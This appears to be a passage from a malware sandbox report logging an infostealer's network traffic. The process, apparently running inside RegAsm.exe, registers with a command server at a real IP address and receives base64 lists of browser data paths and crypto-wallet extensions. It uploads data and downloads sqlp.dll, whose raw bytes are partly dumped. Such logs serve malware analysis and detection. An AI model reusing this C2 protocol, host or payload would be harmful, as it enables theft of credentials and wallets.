2024-09-26 22:29:46 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 22:29:46 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	57926	5.75.211.162	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:47 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	57927	5.75.211.162	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:48 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:48 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 36 46 36 31 31 46 37 34 30 34 33 34 37 39 32 32 31 31 33 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 2d 2d 0d Data Ascii: ------KKJEBAAECBGDHIECAKJKContent-Disposition: form-data; name="hwid"CD6F611F74043479221132-a33c7340-61ca------KKJEBAAECBGDHIECAKJKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------KKJEBAAECBGDHIECAKJK--
2024-09-26 22:29:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:49 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 64 36 34 37 31 33 65 35 64 61 35 32 31 31 36 39 62 36 32 37 37 65 65 62 39 32 36 63 36 35 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|0d64713e5da521169b6277eeb926c65a\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	57928	5.75.211.162	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:49 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:49 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 64 36 34 37 31 33 65 35 64 61 35 32 31 31 36 39 62 36 32 37 37 65 65 62 39 32 36 63 36 35 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="token"0d64713e5da521169b6277eeb926c65a------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FHJDAAEGIDHDGCAAFCBACont
2024-09-26 22:29:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:50 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	57929	5.75.211.162	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:51 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:51 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 64 36 34 37 31 33 65 35 64 61 35 32 31 31 36 39 62 36 32 37 37 65 65 62 39 32 36 63 36 35 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="token"0d64713e5da521169b6277eeb926c65a------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------BAAFBFBAAKECFIEBFIECCont
2024-09-26 22:29:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:52 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	57930	5.75.211.162	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:52 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:52 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 64 36 34 37 31 33 65 35 64 61 35 32 31 31 36 39 62 36 32 37 37 65 65 62 39 32 36 63 36 35 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="token"0d64713e5da521169b6277eeb926c65a------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FIIIIJKFCAAECAKFIEHCCont
2024-09-26 22:29:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:53 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	57931	5.75.211.162	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:54 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJEBGDAFHJEBGDGIJDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6173 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:54 UTC	6173	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 64 36 34 37 31 33 65 35 64 61 35 32 31 31 36 39 62 36 32 37 37 65 65 62 39 32 36 63 36 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------JJJEBGDAFHJEBGDGIJDHContent-Disposition: form-data; name="token"0d64713e5da521169b6277eeb926c65a------JJJEBGDAFHJEBGDGIJDHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JJJEBGDAFHJEBGDGIJDHCont
2024-09-26 22:29:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	57932	5.75.211.162	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:56 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:56 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:56 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:29:56 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:29:56 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 22:29:56 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 22:29:56 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 22:29:56 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 22:29:56 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 22:29:56 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 22:29:56 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
